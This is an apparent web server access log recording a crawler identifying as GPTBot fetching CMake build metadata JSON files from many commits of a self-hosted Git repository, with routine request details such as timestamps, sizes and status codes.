"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12791] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35750] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19998] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12764] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12792] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35752] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12796] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13750] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13624] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12871] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13745] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19997] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35756] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12871] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13625] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13625] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" 